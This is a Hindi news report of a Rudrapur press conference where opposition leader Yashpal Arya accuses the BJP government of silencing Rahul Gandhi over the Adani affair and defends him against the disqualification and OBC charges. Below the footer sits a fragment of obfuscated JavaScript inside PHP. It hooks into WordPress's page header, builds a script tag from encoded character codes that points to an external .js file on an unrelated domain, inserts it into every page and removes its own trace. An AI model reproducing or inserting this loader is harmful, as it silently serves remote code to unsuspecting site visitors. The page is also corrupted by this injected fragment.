Saturday, July 13, 2024
spot_img

रुद्रपुर :विपक्ष की अवाज दबाने की हो रही कोशिश – नेता प्रतिपक्ष यशपाल आर्य

रुदपुर ::- नेता प्रतिपक्ष यशपाल आर्य ने शुक्रवार को रूद्रपुर में आयोजित प्रेस वार्ता में कहा की नरेंद्र मोदी सरकार राहुल गांधी के प्रति शत्रुतापूर्ण रवैया अख्तियार करते हुए एक-एक कर ऐसे निर्णय ले रही है ताकि वो अडानी मुद्दे पर राहुल गांधी को खामोश करा सके लेकिन राहुल गांधी बेखौफ होकर मोदी और अडानी के रिश्तों को उजागर करते रहेंगे।
आर्य ने कहा 7 फरवरी, 2023 को राहुल गांधी ने संसद में अपने भाषण में अडानी मेगा घोटाले पर 2 सरल प्रश्न पूछे -रु. अडानी के स्वामित्व वाली शेल कंपनियों में 20,000 करोड़ या 3 बिलियन डॉलर हैं। अडानी इस पैसे को उत्पन्न नहीं कर सकता था। वह इंफ्रास्ट्रक्चर बिजनेस में हैं। यह पैसा कहां से आया? किसका पैसा है? ये किसकी शेल कंपनियां हैं? ये कंपनियां डिफेंस फील्ड में काम कर रही हैं। कोई क्यों नहीं जानता? यह किसका पैसा है? इसमें एक चीनी नागरिक शामिल है। कोई यह सवाल क्यों नहीं पूछ रहा है कि यह चीनी नागरिक कौन है?ये पहला सवाल था

अडानी के साथ प्रधानमंत्री के क्या संबंध हैं? राहुल गांधी ने अडानी के विमान में आराम करते हुए पीएम मोदी की तस्वीर दिखाई। उन्होंने रक्षा उद्योग के बारे में, हवाई अड्डों के बारे में, श्रीलंका में दिए गए बयानों के बारे में, बांग्लादेश में दिए गए बयानों के बारे में, ऑस्ट्रेलिया में स्टेट बैंक (भारत के) के अध्यक्ष के साथ बैठे श्री नरेंद्र मोदी की तस्वीरें, जिन्होंने कथित तौर पर $ 1 बिलियन का ऋण स्वीकृत किया था, के बारे में दस्तावेज दिए। अदानी। यह सबूत के साथ सवालों का दूसरा सेट था।

आर्य ने कहा कि अडानी के घोटाले पर संसद में राहुल गांधी के भाषण के ठीक 9 दिन बाद, उनके खिलाफ मानहानि का मुकदमा फिर से शुरू हो गया। राज्यसभा में कांग्रेस अध्यक्ष मल्लिकार्जुन खड़गे के भाषण से अडानी घोटाले के बहुत विशिष्ट संदर्भ और राहुल गांधी के भाषण (लगभग पूरी तरह से) को संसद के रिकॉर्ड से हटा दिया गया।
संसद के बजट सत्र के दूसरे भाग में, भारत के इतिहास में पहली बार एक सत्ताधारी पार्टी- भाजपा संसद को बाधित कर रही है और इसे चलने नहीं दे रही है। यह अदानी को बचाने के लिए एक डायवर्सनरी रणनीति है। जबकि संयुक्त विपक्ष इस पर जेपीसी (संयुक्त संसदीय समिति) चाहता है।

राहुल गांधी पर भाजपा के मंत्रियों द्वारा हमला किया गया था और दो लिखित अनुरोधों और एक बैठक सहित अध्यक्ष से तीन अनुरोधों के बावजूद संसद में बोलने का अवसर देने से इनकार कर दिया गया था। इससे साफ पता चलता है कि पीएम मोदी नहीं चाहते कि अडानी के साथ उनके रिश्ते का पर्दाफाश हो।

उन्होंने दावा किया कि बीजेपी की ध्यान भटकाने की रणनीति 3 बेतुके आरोपों से साबित होती है:सबसे पहले, उन्होंने दावा किया कि श्री राहुल गांधी ने “विदेशी ताकतों” से लंदन में भारत की मदद करने के लिए कहा। वह सफेद झूठ है!

अगर कोई इसके बजाय, उन्होंने जो कहा वह था “यह हमारी समस्या है (मोदी के तहत लोकतांत्रिक संस्थानों का क्षरण); यह आंतरिक समस्या है और यह भारत की समस्या है और समाधान अंदर से आने वाला है, यह बाहर से नहीं आने वाला है।
दूसरा भाजपा अब यह झूठा हौआ खड़ा कर रही है कि श्री राहुल गांधी ने ओबीसी को सिर्फ इसलिए निशाना बनाया, क्योंकि उन्होंने पीएम मोदी से एक सवाल किया था! ध्यान भटकाने का एक और बोगस हथकंडा! एकता फैलाने के लिए “भारत जोड़ो यात्रा” में 4000 किलोमीटर पैदल चलने वाला व्यक्ति कैसे एक समुदाय को निशाना बना सकता है।


फिर बीजेपी की अयोग्यता आई। सूरत, गुजरात में एक निचली अदालत के फैसले के 24 घंटे के भीतर- भाजपा ने गांधी को लोकसभा से अयोग्य घोषित करने के लिए “बिजली की गति” से काम किया, भले ही अदालत ने उन्हें उच्च न्यायालय में अपील करने के लिए 30 दिन का समय दिया था! भाजपा राहुल गांधी से इतना डरती क्यों है।

ओबीसी समुदाय का अपमान करने का आरोप लगाने की भाजपा की घटिया चाल ,स्पष्ट हताशा साबित करती है।

सबसे पहले राहुल गांधी द्वारा दिया गया बयान यह पूछ रहा था कि कुछ चोरों का एक ही उपनाम (नीरव मोदी, ललित मोदी और नरेंद्र मोदी) क्यों है – ऐसा नहीं है कि मोदी को कोई भी चोर कहता है। किसी समुदाय को निशाना नहीं बनाया गया।

न तो नीरव मोदी और न ही ललित मोदी ओबीसी हैं। और उनकी जाति जो भी हो, क्या उन्होंने धोखाधड़ी नहीं की भाजपा धोखेबाजों को क्यों बचा रही है।

तीसरे, कांग्रेस पार्टी में 2 ओबीसी मुख्यमंत्री हैं। इससे साबित होता है कि कांग्रेस उनके योगदान को महत्व देती है।


आर्य ने कहा राहुल गांधी और कांग्रेस डरने वाली नहीं है। भारत जोड़ो यात्रा के दौरान हम सीधे लोगों के पास गए और उनकी चिंताओं को सुना- महंगाई, बेरोजगारी, सामाजिक असमानता और संस्थानों पर कब्जा। हम लोगों के इन मुद्दों को उठाते रहेंगे और अपना संदेश सीधे लोगों तक पहुंचाते रहेंगे।इस अवसर पर ज़िला अध्यक्ष ऊधम सिंह नगर हिमांशु गावा,उपनेता प्रतिपक्ष विधायक खटीमा श्री भुवन कापड़ी,जसपुर विधायक आदेश चौहान ,नानकमत्ता विधायक गोपाल राणा,महानगरअध्यक्ष सीपी शर्मा, गणेश उपाध्याय,पूर्व विधायक प्रेमानंद महाजन, ममताहालदार उपस्थित रहे।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>